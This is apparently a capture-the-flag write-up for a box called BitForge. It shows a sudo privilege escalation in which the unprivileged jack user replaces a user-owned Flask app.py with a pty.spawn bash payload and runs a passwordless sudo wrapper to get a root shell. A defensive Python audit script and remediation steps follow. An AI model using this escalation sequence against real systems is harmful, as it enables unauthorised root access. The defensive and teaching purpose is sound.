Writable Sudo Flask App


The jack user can run /usr/bin/flask_password_changer as root via sudo without being prompted for a password. /usr/bin/flask_password_changer is a Bash script that starts a Flask application, /opt/password_change_app/app.py, and that file is owned by the jack user.

jack@BitForge:/opt/password_change_app$ mv ./app.py ./app.py.bak
jack@BitForge:/opt/password_change_app$ echo -n 'import pty; pty.spawn("/bin/bash")' > ./app.py

Using the basic technique, I can overwrite the app.py file

jack@BitForge:/opt/password_change_app$ sudo -u root /usr/bin/flask_password_changer
root@BitForge:/opt/password_change_app#
root@BitForge:/opt/password_change_app#
root@BitForge:/opt/password_change_app# whoami
root
root@BitForge:/opt/password_change_app# hostname
BitForge
root@BitForge:/opt/password_change_app# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:5a:98 brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.196.186/24 brd 192.168.196.255 scope global ens192
       valid_lft forever preferred_lft forever

System-level compromise
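The escalation works because a passwordless sudo rule runs a root-owned wrapper that in turn executes a file owned by the unprivileged user, inside a directory that user can write to (the mv above needs write access on the directory, not just the file). The script below is an added example from the defender's side, not part of the original writeup or of anything shipped on the BitForge box: it audits such a chain by reporting non-root ownership, group/world-writable bits and symlinks on the target file and its parent directory. The function names (audit_path, audit_chain, build_demo) and the temporary directory layout it builds for the demo are assumptions.

```python
import os
import shutil
import stat
import sys
import tempfile


def audit_path(path, root_uid=0):
    """Return findings for one file or directory; an empty list means OK.

    Anything a sudo rule ends up executing as root (and the directory it
    lives in) must be owned by root and must not be writable by group or
    others, otherwise the caller can edit or replace it and have root run
    their own code.
    """
    st = os.lstat(path)
    mode = stat.S_IMODE(st.st_mode)
    findings = []
    if stat.S_ISLNK(st.st_mode):
        findings.append(f"{path}: is a symlink, its target could be redirected")
    if st.st_uid != root_uid:
        findings.append(f"{path}: owned by uid {st.st_uid}, not by root")
    if mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable (mode {mode:04o})")
    if mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable (mode {mode:04o})")
    return findings


def audit_chain(path, root_uid=0):
    """Audit the file itself plus its immediate parent directory.

    The directory matters as much as the file: write access there lets a
    user rename the original away and drop a replacement, which is exactly
    the mv + echo sequence used against app.py above.
    """
    path = os.path.abspath(path)
    return audit_path(path, root_uid) + audit_path(os.path.dirname(path), root_uid)


def build_demo(root_uid=None):
    """Constructed layout (an assumption, not files from the box): one directory
    laid out like /opt/password_change_app on BitForge (writable by an
    unprivileged user) and one hardened the way it should be.
    Returns (weak_findings, hardened_findings)."""
    if root_uid is None:
        # Files we create are owned by the current user; for the demo treat
        # that uid as "root" so only the permission bits drive the result.
        root_uid = os.getuid()
    base = tempfile.mkdtemp(prefix="sudo_audit_")
    try:
        weak = os.path.join(base, "weak_app")
        hard = os.path.join(base, "hardened_app")
        for directory, dmode, fmode in ((weak, 0o777, 0o666), (hard, 0o755, 0o644)):
            os.mkdir(directory)
            app = os.path.join(directory, "app.py")
            with open(app, "w") as fh:
                fh.write("print('flask app placeholder')\n")  # constructed stand-in
            os.chmod(app, fmode)
            os.chmod(directory, dmode)
        return (audit_chain(os.path.join(weak, "app.py"), root_uid),
                audit_chain(os.path.join(hard, "app.py"), root_uid))
    finally:
        shutil.rmtree(base, ignore_errors=True)


def main():
    if len(sys.argv) > 1:
        # Real audit: every path a sudo rule executes, compared against uid 0.
        for target in sys.argv[1:]:
            for finding in audit_chain(target) or [f"{target}: no findings"]:
                print(finding)
        return
    weak, hardened = build_demo()
    print("BitForge-style layout:")
    for finding in weak:
        print("  ", finding)
    print("hardened layout:", hardened or "no findings")


if __name__ == "__main__":
    main()
```

On a host like this one, run it with /usr/bin/flask_password_changer and /opt/password_change_app/app.py as arguments; an empty findings list is what a sound NOPASSWD rule should produce. Remediation is chown root:root plus mode 0644 for app.py and 0755 for its directory (so the script is only editable by root), or removing the passwordless sudo rule altogether.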